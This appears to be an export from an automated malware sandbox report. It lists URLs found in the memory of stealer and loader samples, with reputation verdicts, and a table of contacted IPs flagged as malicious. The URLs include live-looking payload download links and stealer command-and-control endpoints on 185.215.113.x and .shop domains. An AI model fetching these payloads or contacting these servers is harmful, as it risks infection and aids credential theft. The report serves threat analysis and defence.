http://tempuri.org/Entity/Id23ResponseD	RegAsm.exe, 00000009.00000002.2875623535.00000000033F4000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003179000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000030B6000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id12Response	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.26/Dem7kTu/index.phpWindows	Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.	stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id2Response	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.x-ways.net/winhex/subscribe-d.htmlU	needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id21Response	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id6ResponseD	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000030D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.26/Dem7kTu/index.phpjavapath;C:	Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.26/rage.Streams.DataWriter	Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.117/inc/needmoney.exeu5n	axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.x-ways.net/order.html-d.htmlS	needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id13ResponseD	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000030D9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000029F3000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://discord.com/api/v9/users/	penis.exe, 00000018.00000002.2884267791.0000000003030000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/fault	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id15Response	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002953000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.innosetup.com/	stories.exe, 00000014.00000003.2826954081.0000000002230000.00000004.00001000.00020000.00000000.sdmp, stories.exe, 00000014.00000003.2827256040.0000000002008000.00000004.00001000.00020000.00000000.sdmp, stories.tmp, 00000015.00000000.2828637379.0000000000401000.00000020.00000001.01000000.00000014.sdmp	false	URL Reputation: safe	unknown
https://api.ip.sb/ip	penis.exe, 00000018.00000002.2884267791.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp, crypted.exe, 0000001B.00000002.2955093646.0000000003A05000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.x-ways.net/winhex/forum/www.x-ways.net/winhex/templates/www.x-ways.net/dongle_protection	needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id1ResponseD	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://185.215.113.16/inc/rstxdhuj.exez&	axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdline	stories.exe, 00000014.00000002.3332146749.0000000000401000.00000020.00000001.01000000.00000013.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.ver)	svchost.exe, 0000001A.00000002.3344988955.0000019DEAC00000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.17/f1ddeb6592c03206/msvcp140.dllfaHD	stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id24Response	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.ecosia.org/newtab/	hjhTHr6fWy.exe, 0000000F.00000002.2936243800.00000000032DD000.00000004.00000800.00020000.00000000.sdmp, stealc_default2.exe, 00000013.00000002.2994583849.0000000000805000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.php3	stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id21ResponseD	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.php4	stealc_default2.exe, 00000013.00000002.2994583849.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://185.215.113.17/f1ddeb6592c03206/softokn3.dllJa	stealc_default2.exe, 00000013.00000002.2994583849.00000000007EA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.26/6122658-3693405117-2476756634-1003	Hkbsse.exe, 00000012.00000002.3336638317.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL	stealc_default2.exe, 00000013.00000003.2954194570.000000002D39E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref	stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.103/mine/random.exe	axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477	stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://194.116.215.195/12dsvc.exe	axplong.exe, 00000006.00000003.3054813558.000000000162D000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000006.00000003.3138607330.000000000162D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id10ResponseD	RegAsm.exe, 00000009.00000002.2875623535.000000000338C000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000003095000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://176.113.115.95/thebig/stories.exe	Hkbsse.exe, 00000012.00000002.3336638317.00000000007D9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://tempuri.org/Entity/Id5Response	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id15ResponseD	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002F1B000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002953000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id10Response	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/Renew	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.26/Dem7kTu/index.phph	Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8Response	RegAsm.exe, 00000009.00000002.2875623535.0000000003281000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.0000000002851000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ocsp.sectigo.com0	needmoney.exe, 00000016.00000002.2960319681.0000000002E10000.00000040.00001000.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://185.215.113.26/Dem7kTu/index.phps	Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU	stories.exe, 00000014.00000002.3332146749.0000000000401000.00000020.00000001.01000000.00000013.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi	stealc_default2.exe, 00000013.00000002.3044045737.00000000271A5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2006/02/addressingidentity	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.26/Dem7kTu/index.phpy	Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.ip.s	penis.exe, 00000018.00000002.2884267791.0000000002F9E000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpf	stealc_default2.exe, 00000013.00000002.2994583849.000000000079E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/D	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.17/2fb6c2cc8dce150a.phpp	stealc_default2.exe, 00000013.00000002.2994583849.00000000007C9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://schemas.xmlsoap.org/ws/2004/06/addressingex	RegAsm.exe, 00000009.00000002.2875623535.000000000332A000.00000004.00000800.00020000.00000000.sdmp, hjhTHr6fWy.exe, 0000000F.00000002.2936243800.0000000002DF8000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001F.00000002.3109509336.00000000028FA000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://185.215.113.26/Dem7kTu/index.phpK	Hkbsse.exe, 00000012.00000002.3336638317.0000000000806000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
91.202.233.158	unknown	Russian Federation	9009	M247GB	true
194.116.215.195	unknown	unknown	44676	VMAGE-ASRU	false
185.215.113.26	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.67	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
142.250.186.174	google.com	United States	15169	GOOGLEUS	false
104.21.2.13	ballotnwu.site	United States	13335	CLOUDFLARENETUS	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.17	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
95.179.250.45	unknown	Netherlands	20473	AS-CHOOPAUS	true
172.67.208.139	reinforcenh.shop	United States	13335	CLOUDFLARENETUS	true
104.21.4.136	gutterydhowi.shop	United States	13335	CLOUDFLARENETUS	true
172.67.162.108	drawzhotdog.shop	United States	13335	CLOUDFLARENETUS	true
188.114.97.3	fragnantbui.shop	European Union	13335	CLOUDFLARENETUS	true
65.21.18.51	unknown	United States	199592	CP-ASDE	true
188.114.96.3	offensivedzvju.shop	European Union	13335	CLOUDFLARENETUS	true
176.113.115.95	unknown	Russian Federation	49505	SELECTELRU	false
89.105.223.196	unknown	Netherlands	21159	NOVOSERVE-GMBH-ASFrankfurtGermanyNL	true
104.102.49.254	steamcommunity.com	United States	16625	AKAMAI-ASUS	false
